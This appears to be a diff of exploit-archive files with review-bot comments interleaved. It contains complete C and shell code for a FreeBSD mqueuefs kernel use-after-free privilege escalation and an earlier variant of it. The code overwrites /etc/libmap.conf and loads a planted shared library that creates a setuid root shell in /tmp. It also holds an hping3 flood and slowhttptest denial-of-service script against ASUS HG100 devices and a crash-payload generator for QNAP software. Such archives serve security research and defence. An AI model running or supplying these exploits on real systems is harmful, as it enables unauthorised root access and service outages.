return 0;
}
void *write_to_file(void *thread_args) {
int fd, fd2, nbytes;
int *fd_ptr;
char buf[256];
struct thread_data *thread_data;
if (stick_thread_to_core(CORE_1) != 0) {
perror("[!] write_to_file: Could not stick thread to core");
}
fd_ptr = (int *) malloc(sizeof(int));
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = open(ATTACK_PATH, O_RDONLY);
printf("[+] write_to_file: Wait for signal from monitor\n");
pthread_mutex_lock(&write_mtx);
pthread_cond_wait(&write_cond, &write_mtx);
snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
nbytes = write(fd, buf, strlen(buf));
// Reopen directly after write to prevent panic later
//
// After the write f_count == 0 because after trigger_uaf()
// opened the read-only file, f_count == 1 and write()
// calls fdrop() at the end
//
// => f_count == 0
//
// A direct open hopefully assigns the now again free file
// object to fd so that we can prevent the panic with our
// increment primitive.
if ((fd = open_tmp(NULL)) == -1)
perror("[!] write_to_file: open_tmp");
*fd_ptr = fd;
if (nbytes < 0) {
perror("[!] [!] write_to_file:write");
} else if (nbytes > 0) {
printf("[+] write_to_file: We have written something...\n");
if (check_write(fd2) > 0)
printf("[+] write_to_file: It (probably) worked!\n");
else
printf("[!] write_to_file: It worked not :(\n");
}
printf("[+] write_to_file: Exit\n");
pthread_exit(fd_ptr);
}
void prepare(int sv[2], int fds[2]) {
int fd, fd2, i;
printf("[+] Start UaF preparation\n");
printf("[+] This can take a while\n");
// Get a single file descriptor to send via the socket
if ((fd = open_tmp(NULL)) == -1) {
perror("[!] open_tmp");
exit(1);
}
if ((fd2 = dup(fd)) == -1) {
perror("[!] dup");
exit(1);
}
// fp->f_count will increment by 0xfe in one iteration
// doing this 16909320 times will lead to
// f_count = 16909320 * 0xfe + 2 = 0xfffffff2
// Note the 2 because of the former call of dup() and
// the first open().
//
// To test our trigger we can send 0xd more fd's what
// would to an f_count of 0 when fdclose() is called in
// m_dispose_extcontrolm. fdrop() will reduce f_count to
// 0xffffffff = -1 and ultimately panic when _fdrop() is
// called because the latter asserts that f_count is 0.
// _fdrop is called in the first place because
// refcount_release() only checks that f_count is less or
// equal 1 to recognize the last reference.
//
// If we want to trigger the free without panic, we have
// to send 0xf fds and close an own what will lead to an
// fdrop() call without panic as f_count is 1 and reduced
// to 0 by close(). The unclosed descriptor references now
// a free 'struct file'.
for (i = 0; i < 16909320; i++) {
if (i % 1690930 == 0) {
printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093));
}
if (send_recv(fd, sv, N_FDS)) {
perror("[!] prepare:send_recv");
exit(1);
}
}
if (send_recv(fd, sv, 0xf)) {
perror("[!] prepare:send_recv");
exit(1);
}
fds[0] = fd;
fds[1] = fd2;
printf("[+] Finished UaF preparation\n");
}
void read_thread_status(int server_socket) {
int bytes_rec, count;
struct sockaddr_un client;
socklen_t len;
char buf[256];
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
setsockopt(server_socket,
SOL_SOCKET, SO_RCVTIMEO,
(const char*)&tv, sizeof tv);
for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
if (count % 100 == 0) {
printf("[+] Hammer threads ready: %d\n", count);
}
bzero(&client, sizeof(struct sockaddr_un));
bzero(buf, 256);
len = sizeof(struct sockaddr_un);
if ((bytes_rec = recvfrom(server_socket,
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] recvfrom");
break;
}
}
if (count != NUM_FORKS * NUM_THREADS) {
printf("[!] Could not create all hammer threads, will try though!\n");
}
}
void fire() {
int i, j, fd, fd2, bytes_rec, server_socket;
int sv[2], fds[2], hammer_socket[NUM_FORKS];
int *fd_ptr;
char socket_path[256], sync_buf[3], buf[256];
pthread_t write_thread, trigger_thread, monitor_thread;
pthread_t hammer_threads[NUM_THREADS];
pid_t pids[NUM_FORKS];
socklen_t len;
struct thread_data thread_data;
struct sockaddr_un server, client;
struct sockaddr_un hammer_socket_addr[NUM_FORKS];
// Socket for receiving thread status
unlink(SERVER_PATH);
prepare_domain_socket(&server, SERVER_PATH);
server_socket = bind_domain_socket(&server);
// Sockets to receive hammer signal
for (i = 0; i < NUM_FORKS; i++) {
snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
unlink(socket_path);
prepare_domain_socket(&hammer_socket_addr[i], socket_path);
hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
}
strncpy(sync_buf, "1\n", 3);
len = sizeof(struct sockaddr_un);
if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
perror("[!] socketpair");
exit(1);
}
pthread_mutex_init(&write_mtx, NULL);
pthread_mutex_init(&trigger_mtx, NULL);
pthread_cond_init(&write_cond, NULL);
pthread_cond_init(&trigger_cond, NULL);
pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
prepare(sv, fds);
fd = fds[0];
fd2 = fds[1];
thread_data.fd = fd;
thread_data.fd2 = fd2;
pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
for (j = 0; j < NUM_FORKS; j++) {
if ((pids[j] = fork()) < 0) {
perror("[!] fork");
abort();
}
else if (pids[j] == 0) {
pthread_mutex_init(&hammer_mtx, NULL);
pthread_cond_init(&hammer_cond, NULL);
close(fd);
close(fd2);
/* Prevent that a file stream in the hammer threads
* gets the file descriptor of fd for debugging purposes
*/
if ((fd = open_tmp("/tmp/dummy")) == -1)
perror("[!] dummy");
if ((fd2 = open_tmp("/tmp/dummy2")) == -1)
perror("[!] dummy2");
printf("[+] Fork %d fd: %d\n", j, fd);
printf("[+] Fork %d fd2: %d\n", j, fd2);
for (i = 0; i < NUM_THREADS; i++) {
pthread_create(&hammer_threads[i], NULL, hammer, NULL);
}
printf("[+] Fork %d created all threads\n", j);
if ((bytes_rec = recvfrom(hammer_socket[j],
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] accept");
abort();
}
pthread_cond_broadcast(&hammer_cond);
for (i = 0; i < NUM_THREADS; i++) {
pthread_join(hammer_threads[i], NULL);
}
pthread_cond_destroy(&hammer_cond);
pthread_mutex_destroy(&hammer_mtx);
exit(0);
} else {
printf("[+] Created child with PID %d\n", pids[j]);
}
}
read_thread_status(server_socket);
printf("[+] Send signal to Start Hammering\n");
for (i = 0; i < NUM_FORKS; i++) {
if (sendto(hammer_socket[i],
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &hammer_socket_addr[i],
sizeof(hammer_socket_addr[0])) == -1) {
perror("[!] sendto");
exit(1);
}
}
pthread_join(monitor_thread, NULL);
for (i = 0; i < NUM_FORKS; i++) {
kill(pids[i], SIGKILL);
printf("[+] Killed %d\n", pids[i]);
}
pthread_join(write_thread, (void **) &fd_ptr);
pthread_join(trigger_thread, NULL);
pthread_mutex_destroy(&write_mtx);
pthread_mutex_destroy(&trigger_mtx);
pthread_cond_destroy(&write_cond);
pthread_cond_destroy(&trigger_cond);
printf("[+] Returned fd: %d\n", *fd_ptr);
prevent_panic(sv, *fd_ptr);
// fd was acquired from write_to_file
// which allocs a pointer for it
free(fd_ptr);
}
int main(int argc, char **argv)
{
setbuf(stdout, NULL);
fire();
return 0;
}
EOF
cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c
cat > program.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
if (!geteuid())
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
}
EOF
cc -o program.o -c program.c -fPIC
cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "[+] Firing the Heavy Cyber Weapon"
./heavy_cyber_weapon
su
if [ -f /tmp/xxxx ]; then
echo "[+] Enjoy!"
echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
/tmp/xxxx
else
echo "[!] FAIL"
fi
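Review bot: the error check `if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0)` in hammer() can never fire, because fwrite() returns size_t; compare the return value against CHUNK_SIZE (or test ferror()) instead. In check_write() both stat() calls ignore their return value, so the sizes printed for DEFAULT_PATH and ATTACK_PATH may be stale if either call fails, and `%ld` is not the portable conversion for off_t (`%jd` with an `(intmax_t)` cast is). The wrapper script only prints "Do not forget to copy ./libmap.conf back to /etc/libmap.conf" on the success branch; the FAIL branch leaves the user without that reminder even though the backup was taken in both cases.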

754
exploits/freebsd/local/47830.sh Executable file

@ -0,0 +1,754 @@
# Exploit: FreeBSD-SA-19:15.mqueuefs - Privilege Escalation
# Author: Karsten König of Secfault Security
# Date: 2019-12-30
# Change line 719 to choose which vulnerability
# is targeted
#
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
# Exploit for FreeBSD-SA-19:15.mqueuefs and
# FreeBSD-SA-19:24.mqueu
#!/bin/sh
echo "[+] Root Exploit for FreeBSD mqueuefs vulnerabilities"
umask 0000
# libmap.conf has to exist because it is
# the attacked file
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
# Make a backup of the current libmap.conf
# because it has to be reconstructed afterwards
cp /etc/libmap.conf ./
# Write the exploit to a C file
cat > exploit.c << EOF
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <pthread_np.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/cpuset.h>
#include <sys/event.h>
#include <sys/ioctl.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/sysctl.h>
#include <sys/_types.h>
#include <sys/types.h>
#include <sys/un.h>
#define N_OPEN 0x2
// Tweak NUM_THREADS and NUM_FORKS if
// more RAM is available on the target
//
// These parameters were tested with
// up to 16 GB of RAM on a dual-core
// Intel based system
#define N 1000000
#define NUM_THREADS 600
#define NUM_FORKS 3
#define FILE_SIZE 1024
#define CHUNK_SIZE 1
#define N_FILES 25
// These are temporary files
// which are created during
// exploitation
#define SERVER_PATH "/tmp/sync_forks"
#define DEFAULT_PATH "/tmp/pwn"
#define HAMMER_PATH "/tmp/pwn2"
// This is the attacked file
#define ATTACK_PATH "/etc/libmap.conf"
// These are parameters from the attack script
#define HOOK_LIB "libutil.so.9"
#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
// The exploit will stick some threads
// to specific cores
#define CORE_0 0
#define CORE_1 1
// Syscalls from mqueuefs
#define KMQ_OPEN 457
#define KMQ_TIMEDSEND 460
// Taken from sys/mqueue.h
struct mq_attr {
long mq_flags;
long mq_maxmsg;
long mq_msgsize;
long mq_curmsgs;
long __reserved[4];
};
struct thread_data {
int fd;
int fd2;
};
pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
// Both syscalls are indirectly called to be less reliable on
// installed libraries
int mq_open(const char *name, int oflag, mode_t mode,
const struct mq_attr *attr)
{
int fd;
fd = syscall(KMQ_OPEN, name, oflag, mode, attr);
return fd;
}
void mq_timedsend(int fd, char *buf, size_t len,
unsigned prio, const struct timespec *timeout)
{
syscall(KMQ_TIMEDSEND, fd, buf, len, prio, timeout);
}
// Convenience function to open temporary files
int open_tmp(char *path)
{
int fd;
char *real_path;
if (path != NULL) {
real_path = malloc(strlen(path) + 1);
strcpy(real_path, path);
}
else {
real_path = malloc(strlen(DEFAULT_PATH) + 1);
strcpy(real_path, DEFAULT_PATH);
}
if ((fd = open(real_path, O_RDWR | O_CREAT, S_IRWXU)) == -1) {
perror("[!] open");
}
return fd;
}
// Convenience function to prepare a UNIX domain socket
void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
bzero(remote, sizeof(struct sockaddr_un));
remote->sun_family = AF_UNIX;
strncpy(remote->sun_path, path, sizeof(remote->sun_path));
}
// Convenience function to bind a UNIX domain socket
int bind_domain_socket(struct sockaddr_un *remote) {
int server_socket;
if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
if (bind(server_socket,
(struct sockaddr *) remote,
sizeof(struct sockaddr_un)) != 0) {
perror("[!] bind");
exit(1);
}
return server_socket;
}
// Convenience function to connect to a UNIX domain socket
int connect_domain_socket_client() {
int client_socket;
if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
return client_socket;
}
// Prevent panic at termination because f_count of the
// corrupted struct file is 0 at the moment this function
// is called but open file descriptors still points to the struct,
// hence fdrop() is called at exit of the program and will raise a
// kernel panic because f_count will be below 0
//
// So we just use our known primitive to increase f_count
void prevent_panic(int fd)
{
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
}
// Convenience function to stick a thread to a CPU core
int stick_thread_to_core(int core) {
cpuset_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(core, &cpuset);
pthread_t current_thread = pthread_self();
return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
}
// This function will trigger the use-after-free
void *trigger_uaf(void *thread_args) {
struct thread_data *thread_data;
int fd, fd2;
if (stick_thread_to_core(CORE_0) != 0) {
perror("[!] [!] trigger_uaf: Could not stick thread to core");
}
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = thread_data->fd2;
printf("[+] trigger_uaf: fd: %d\n", fd);
printf("[+] trigger_uaf: fd2: %d\n", fd2);
// The thread has to wait for the preparation of the
// race condition
printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
pthread_mutex_lock(&trigger_mtx);
pthread_cond_wait(&trigger_cond, &trigger_mtx);
// This sleep parameter helps to render
// the exploit more reliable
//
// Tweeking may be needed for the target system
usleep(40);
// Close two fds to trigger UaF
//
// This assumes that fget_write() in kern_writev()
// was already successful!
//
// Otherwise kernel panic is triggered
//
// f_count = 2 (primitive+fget_write)
close(fd);
close(fd2);
// f_count = 0 => free
fd = open(ATTACK_PATH, O_RDONLY);
// refcount = 1
// all fds do now point to the attacked path
printf("[+] trigger_uaf: Opened read-only file\n");
printf("[+] trigger_uaf: Exit\n");
pthread_exit(NULL);
}
// This function will write to many invalid file streams
//
// This will eventually increase the number of dirty buffers
// in the kernel and creates an exploitable race condition
// for the Use-after-Free
void *hammer(void *arg) {
int i, j, k, client_socket;
char buf[FILE_SIZE], sync_buf[3];
FILE *fd[N_FILES];
struct sockaddr_un remote;
prepare_domain_socket(&remote, SERVER_PATH);
client_socket = connect_domain_socket_client();
strncpy(sync_buf, "1\n", 3);
// Open many files and unlink them directly
// to render the file stream invalid
for (i = 0; i < N_FILES; i++) {
unlink(HAMMER_PATH);
if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
perror("[!] fopen");
exit(1);
}
}
for (i = 0; i < FILE_SIZE; i++) {
buf[i] = 'a';
}
pthread_mutex_lock(&hammer_mtx);
// Signal that the thread is prepared
//
// Sometimes sendto() fails because
// no free buffer is available
for (;;) {
if (sendto(client_socket,
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &remote,
sizeof(remote)) != -1) {
break;
}
}
// Wait for the other hammer threads
pthread_cond_wait(&hammer_cond, &hammer_mtx);
pthread_mutex_unlock(&hammer_mtx);
// Write to the file streams to create many dirty buffers
for (i = 0; i < N; i++) {
for (k = 0; k < N_FILES; k++) {
rewind(fd[k]);
}
for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
for (k = 0; k < N_FILES; k++) {
if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
perror("[!] fwrite");
exit(1);
}
}
fflush(NULL);
}
}
pthread_exit(NULL);
}
// This function monitors the number of
// dirty buffers.
//
// If enough dirty buffers do exist, a
// signal to the write and Use-after-Free
// trigger thread is signalled to
// execute the actual attack
//
// Works on UFS only
void *monitor_dirty_buffers(void *arg) {
int hidirtybuffers, numdirtybuffers;
size_t len;
len = sizeof(int);
if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
perror("[!] sysctlbyname hidirtybuffers");
exit(1);
};
printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
while(1) {
sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
if (numdirtybuffers >= hidirtybuffers) {
pthread_cond_signal(&write_cond);
pthread_cond_signal(&trigger_cond);
printf("[+] monitor: Reached hidirtybuffers watermark\n");
break;
}
}
pthread_exit(NULL);
}
// Check if the write to the attacked
// path was successful
int check_write(int fd) {
char buf[256];
int nbytes;
struct stat st;
printf("[+] check_write\n");
stat(DEFAULT_PATH, &st);
printf("[+] %s size: %lld\n", DEFAULT_PATH, st.st_size);
stat(ATTACK_PATH, &st);
printf("[+] %s size: %lld\n", ATTACK_PATH, st.st_size);
nbytes = read(fd, buf, strlen(HOOK_LIB));
printf("[+] Read bytes: %d\n", nbytes);
if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
return 1;
}
else if (nbytes < 0) {
perror("[!] check_write:read");
printf("[!] check_write:Cannot check if it worked!");
return 1;
}
return 0;
}
// This function will execute the write operation
// to the attacked path
void *write_to_file(void *thread_args) {
int fd, fd2, nbytes;
int *fd_ptr;
char buf[256];
struct thread_data *thread_data;
struct mq_attr attrs;
if (stick_thread_to_core(CORE_1) != 0) {
perror("[!] write_to_file: Could not stick thread to core");
}
fd_ptr = malloc(sizeof(int));
attrs.mq_maxmsg = 10;
attrs.mq_msgsize = sizeof(int);
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = open(ATTACK_PATH, O_RDONLY);
// Wait for the signal to execute the write operation
printf("[+] write_to_file: Wait for signal from monitor\n");
pthread_mutex_lock(&write_mtx);
pthread_cond_wait(&write_cond, &write_mtx);
// Write to the temporary file
//
// During the write operation the exploit will trigger
// the Use-after-Free and exchange the written file
// with the attacked file to render a write to it
snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
nbytes = write(fd, buf, strlen(buf));
// Reopen directly after write to prevent panic later
//
// After the write f_count == 0 because after trigger_uaf()
// opened the read-only file, f_count == 1 and write()
// calls fdrop() at the end
//
// => f_count == 0
//
// A direct open hopefully assigns the now again free file
// object to fd so that we can prevent the panic with our
// increment primitive.
*fd_ptr = mq_open("/pwn_mq", O_RDWR | O_CREAT, 0666, &attrs);
if (*fd_ptr == -1)
perror("[!] write_to_file: mq_open");
if (nbytes < 0) {
perror("[!] write_to_file: write");
} else if (nbytes > 0) {
printf("[+] write_to_file: We have written something...\n");
if (check_write(fd2) > 0)
printf("[+] write_to_file: It (probably) worked!\n");
else
printf("[!] write_to_file: It worked not :(\n");
}
printf("[+] write_to_file: Exit\n");
pthread_exit(fd_ptr);
}
// This function prepares the Use-after-Free due to
// a reference counter overflow
void prepare(int fds[3]) {
int fd, fd2, fd3, trigger_fd;
u_int32_t i;
struct mq_attr attrs;
attrs.mq_maxmsg = 10;
attrs.mq_msgsize = sizeof(int);
printf("[+] Start UaF preparation\n");
printf("[+] This can take a while\n");
// Open a mqueue file
fd = mq_open("/pwn_mq", O_RDWR | O_CREAT, 0666, &attrs);
if (fd == -1) {
perror("open");
exit(1);
}
// fp->f_count will be incremented by 1 per iteration due
// to the bug in freebsd32_kmq_timedsend()
//
// That is, 0xfffffffe iterations will increment it to
// 0xffffffff (f_count starts with 1 because of mq_open())
//
// The bug is triggered because freebsd_kqm_timedsend will eventually
// try to call copyin() with the pointer to address 0x1 which
// is invalid
for (i = 0; i < 0xfffffffe; i++) {
// just a progress message, nothing special about the magic values
if (i % 0x19999990 == 0)
printf("[+] Progress: %d%%\n", (u_int32_t) (i / 0x28f5c28));
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
}
// Every dup() increases fp->f_count by 1
//
// Using dup() works because FreeBSD's mqueue implementation
// is implemented by using file objects (struct file) internally.
//
// This circumvents an infinite loop in fget_unlocked() as dup()
// does not use _fget() but fhold() to increase the counter.
fd2 = dup(fd);
if (fd2 == -1) {
perror("dup");
exit(1);
}
fd3 = dup(fd);
if (fd3 == -1) {
perror("dup");
exit(1);
}
// Close the mqueue file to trigger a free operation
//
// The descriptors fd2 and fd3 will still point
// to the freed object
//
// Opening another file will render these descriptors
// to point the newly opened file
close(fd);
trigger_fd = open_tmp(NULL);
fds[0] = trigger_fd;
fds[1] = fd2;
fds[2] = fd3;
printf("[+] Finished UaF preparation\n");
}
// This function will monitor that all
// hammer threads are opened
void read_thread_status(int server_socket) {
int bytes_rec, count;
struct sockaddr_un client;
socklen_t len;
char buf[256];
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
setsockopt(server_socket,
SOL_SOCKET, SO_RCVTIMEO,
(const char*)&tv, sizeof tv);
for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
if (count % 100 == 0) {
printf("[+] Hammer threads ready: %d\n", count);
}
bzero(&client, sizeof(struct sockaddr_un));
bzero(buf, 256);
len = sizeof(struct sockaddr_un);
if ((bytes_rec = recvfrom(server_socket,
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] recvfrom");
break;
}
}
if (count != NUM_FORKS * NUM_THREADS) {
printf("[!] Could not create all hammer threads, will try though!\n");
}
}
// This function will execute the whole exploit
void fire() {
int i, j, fd, fd2, fd3, bytes_rec, server_socket;
int sv[2], fds[3], hammer_socket[NUM_FORKS];
int *fd_ptr;
char socket_path[256], sync_buf[3], buf[256];
pthread_t write_thread, trigger_thread, monitor_thread;
pthread_t hammer_threads[NUM_THREADS];
pid_t pids[NUM_FORKS];
socklen_t len;
struct thread_data thread_data;
struct sockaddr_un server, client;
struct sockaddr_un hammer_socket_addr[NUM_FORKS];
// Socket for receiving thread status
unlink(SERVER_PATH);
prepare_domain_socket(&server, SERVER_PATH);
server_socket = bind_domain_socket(&server);
// Sockets to receive hammer signal
for (i = 0; i < NUM_FORKS; i++) {
snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
unlink(socket_path);
prepare_domain_socket(&hammer_socket_addr[i], socket_path);
hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
}
strncpy(sync_buf, "1\n", 3);
len = sizeof(struct sockaddr_un);
if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
perror("[!] socketpair");
exit(1);
}
pthread_mutex_init(&write_mtx, NULL);
pthread_mutex_init(&trigger_mtx, NULL);
pthread_cond_init(&write_cond, NULL);
pthread_cond_init(&trigger_cond, NULL);
// Create the thread to monitor the number of
// dirty buffers directly in the beginning
// to be ready when needed
pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
// Prepare the UaF using the 0day
prepare(fds);
fd = fds[0];
fd2 = fds[1];
fd3 = fds[2];
// Create the threads which will execute the exploit
thread_data.fd = fd;
thread_data.fd2 = fd2;
pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
for (j = 0; j < NUM_FORKS; j++) {
if ((pids[j] = fork()) < 0) {
perror("[!] fork");
abort();
}
else if (pids[j] == 0) {
// Close the file descriptors
// becasue each fork will have an own reference
// to the file object, thus increasing the
// reference counter
close(fd);
close(fd2);
close(fd3);
pthread_mutex_init(&hammer_mtx, NULL);
pthread_cond_init(&hammer_cond, NULL);
// Create the hammer threads
for (i = 0; i < NUM_THREADS; i++) {
pthread_create(&hammer_threads[i], NULL, hammer, NULL);
}
printf("[+] Fork %d created all threads\n", j);
// Wait for the signal to start hammering from the parent
if ((bytes_rec = recvfrom(hammer_socket[j],
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] accept");
abort();
}
// Broadcast to the hammer threads to
// start hammering
pthread_cond_broadcast(&hammer_cond);
// Wait for the hammer threads
for (i = 0; i < NUM_THREADS; i++) {
pthread_join(hammer_threads[i], NULL);
}
pthread_cond_destroy(&hammer_cond);
pthread_mutex_destroy(&hammer_mtx);
exit(0);
} else {
printf("[+] Created child with PID %d\n", pids[j]);
}
}
// Wait for the preparation of all hammer threads
// in the forks.
//
// If all are prepared, send a signal to the childs
// to start the hammering process to create dirty
// buffers.
read_thread_status(server_socket);
printf("[+] Send signal to Start Hammering\n");
for (i = 0; i < NUM_FORKS; i++) {
if (sendto(hammer_socket[i],
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &hammer_socket_addr[i],
sizeof(hammer_socket_addr[0])) == -1) {
perror("[!] sendto");
exit(1);
}
}
// Wait for all threads to finish
pthread_join(monitor_thread, NULL);
for (i = 0; i < NUM_FORKS; i++) {
kill(pids[i], SIGKILL);
printf("[+] Killed %d\n", pids[i]);
}
pthread_join(write_thread, (void **) &fd_ptr);
pthread_join(trigger_thread, NULL);
pthread_mutex_destroy(&write_mtx);
pthread_mutex_destroy(&trigger_mtx);
pthread_cond_destroy(&write_cond);
pthread_cond_destroy(&trigger_cond);
// Prevent a kernel panic
prevent_panic(*fd_ptr);
// fd was acquired from write_to_file
// which allocs a pointer for it
free(fd_ptr);
}
int main(int argc, char **argv)
{
setbuf(stdout, NULL);
fire();
return 0;
}
EOF
# Compile with -m32 to exploit FreeBSD-SA-19:24.mqueuefs
cc -o exploit -lpthread exploit.c
# cc -o exploit -m32 -lpthread exploit.c
cat > program.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
if (!geteuid())
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
}
EOF
# Compile the shared library object
cc -o program.o -c program.c -fPIC
cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
# Start the exploit
#
# su will execute the shared library object
# that creates the shell binary copy
echo "[+] Firing the Exploit"
./exploit
su
# Ensure that everything has worked
# and execute the root-shell
if [ -f /tmp/xxxx ]; then
echo "[+] Enjoy!"
echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
/tmp/xxxx
else
echo "[!] FAIL"
fi
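Review bot: `#!/bin/sh` is on line 10 of the file, after the comment header beginning `# Exploit: FreeBSD-SA-19:15.mqueuefs`, so it is treated as an ordinary comment and is not used when the file is executed directly; move it to line 1 and keep the header below it. In check_write(), the `nbytes < 0` branch prints "Cannot check if it worked!" and then returns 1, the same value as success, so write_to_file() reports "It (probably) worked!" on a read error; return a distinct value for the unknown case. The `fwrite(...) < 0` test in hammer() is dead code since fwrite() returns size_t. Unused declarations worth removing: `N_OPEN`, `count_mtx`/`count_cond`, and the socketpair `sv` created in fire(), which is never referenced afterwards in this version.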

34
exploits/hardware/dos/46720.sh Executable file

@ -0,0 +1,34 @@
# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS
# Date: 2019-04-14 # Exploit Author: YinT Wang;
# Vendor Homepage: www.asus.com
# Version: Hardware version: HG100 、Firmware version: 1.05.12
# Tested on: Currnet 1.05.12
# CVE : CVE-2018-11492
1. Description
The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).
2.Proof of Concept
Just Execute the following script in kali which could crash the devices
1. IPv4 packet and in result of devices crash.which written in linux script.
#needed to co-operate with hping3 tool
#with the time period at least 220s which could cause web server of HG100 devices crash
#!/bin/bash
read -p "enter the ip of HG100 here " url
hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
sleep 220
echo "Hping3 V c 10000 S w 64 flood rand-source $url time 220s"
exit 0
2.Slowhttp test and caused the devices crash.which written in linux script.
#needed to co-operate with slowhttptest tool
#with the time period 600s which could cause web server of HG100 devices crash
#!/bin/bash
read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
slowhttptest -H -R -c 10000 -l 600 -u $url
sleep 600
echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
exit 0
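Review bot: as committed, this .sh file is not runnable as a whole: the unquoted prose lines (`1. Description`, `2.Proof of Concept`, `1. IPv4 packet and in result of devices crash...`) would be executed as commands, and each of the two `#!/bin/bash` lines sits in the middle of the file rather than on line 1. Either prefix the prose with `#` or split the two PoCs into separate scripts. Header nits: `# Date: 2019-04-14 # Exploit Author: YinT Wang;` merges two header fields on one line, and `Currnet` in the Tested-on line should read `Current`.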

29
exploits/hardware/dos/46733.py Executable file

@ -0,0 +1,29 @@
#!/usr/bin/python
# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
# Date: 19/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.qnap.com
# Version: 1.3.4.0317 and below are vulnerable
# Software Link: https://www.qnap.com/en/utilities/essentials
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP/7/10 (version 1.3.3.0925)
# CVE: CVE-2019-7181
# POC
# 1.) Generate qnap.txt
# 2.) Copy the contents of qnap.txt to the clipboard
# 3.) Paste the contents in any username/password field(Add or Edit VPN)
# 4.) Click ok, program crashes.
# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.
buffer = "A" * 1000
payload = buffer
try:
f=open("qnap.txt","w")
print "[+] Creating %s bytes QNAP payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
